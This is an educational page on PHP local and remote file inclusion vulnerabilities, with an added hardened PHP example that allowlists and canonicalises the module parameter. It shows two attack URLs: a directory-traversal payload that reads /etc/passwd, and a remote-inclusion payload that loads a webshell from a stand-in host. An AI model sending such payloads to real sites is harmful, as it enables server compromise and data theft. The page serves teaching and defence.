File include

File Inclusion Vulnerabilities: LFI and RFI

File inclusion vulnerabilities allow an attacker to load arbitrary content onto a website by exploiting improper handling of input parameters that specify file paths. These vulnerabilities fall into two main categories:

  1. Local File Inclusion (LFI): Enables an attacker to include local files on the server (e.g., configuration files, sensitive data).

  2. Remote File Inclusion (RFI): Allows an attacker to include files from remote servers, potentially introducing malicious code (e.g., webshells or reverse shells).


Dangerous Outcomes of File Inclusion

  1. Code Execution: Attackers can execute arbitrary code by including malicious files, such as a webshell or reverse shell.

  2. Website Defacement: If an attacker uploads a malicious file to the server and includes it, the website's content can be modified.

  3. Directory Listing: Attackers can gain unauthorized access to sensitive server directories and files, exposing confidential information.


Example of a Vulnerable URL

https://example-site.com/?module=module.php

The module parameter specifies a file to include. If not properly validated, this can be exploited.


Exploitation Examples

1. Local File Inclusion (LFI)

An attacker exploits directory traversal to read sensitive server files. Example:

https://example-site.com/?module=../../../etc/passwd%00

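This includes the /etc/passwd file (a sensitive system file) by navigating up the directory structure using ../. The trailing %00 is a URL-encoded null byte; in PHP versions before 5.3.4 it truncated any suffix (such as .php) that the application appended to the path, and later versions reject paths that contain it.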


2. Remote File Inclusion (RFI)

An attacker includes a malicious file hosted on a remote server to execute arbitrary code. Example:

https://example-site.com/?module=https://fake-site.com/webshell.php%00

This includes a malicious webshell.php file, which could allow the attacker to execute commands on the server.
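
One way to validate the module parameter so that neither of the two URLs above reaches include, shown as an added example that is not part of the original page. It assumes a PHP application; the modules directory, the allowlist entry news.php and the resolve_module helper are hypothetical.

```php
<?php
// Added example (not from the original page): hardened handling of ?module=
// Assumptions: modules live in ./modules; the allowlist entries are illustrative.
// Also keep allow_url_include = Off in php.ini so include never fetches URLs.

const MODULE_DIR = __DIR__ . '/modules';

// Pattern the page describes as vulnerable, for comparison only:
//   include $_GET['module'];

/**
 * Map a user-supplied module name to a canonical path, or null if rejected.
 */
function resolve_module(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist of exact names. This alone rejects "../../../etc/passwd",
    //    "https://..." values and anything carrying a null byte.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 2. Defense in depth: canonicalise (resolves symlinks and "..") and
    //    confirm the result is still inside the module directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside MODULE_DIR (e.g. via a symlink)
    }
    return $path;
}

$allowed   = ['module.php', 'news.php'];
$requested = $_GET['module'] ?? 'module.php';

// A non-string value (e.g. ?module[]=x) is rejected before the typed call.
$path = is_string($requested) ? resolve_module($requested, MODULE_DIR, $allowed) : null;

if ($path === null) {
    http_response_code(400);
    exit('Unknown module');
}
include $path;
```

Rejected requests are worth logging with the raw parameter value, since ../ sequences, URL schemes or %00 in this parameter indicate probing for the issues described above.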


Key Difference: Directory Traversal vs. File Inclusion

| Aspect | Directory Traversal | File Inclusion |
|---|---|---|
| Purpose | Access files by navigating directories (e.g., ../../) | Includes the file in the server’s response. |
| Result | Reads sensitive files. | May result in code execution or website defacement. |
| Additional Risks | N/A | Can enable SSRF with RFI. |

  • Directory Traversal enables access to restricted files without including them in the web server’s response.

  • File Inclusion directly integrates the specified file’s content into the server's response, which can lead to execution of malicious code.
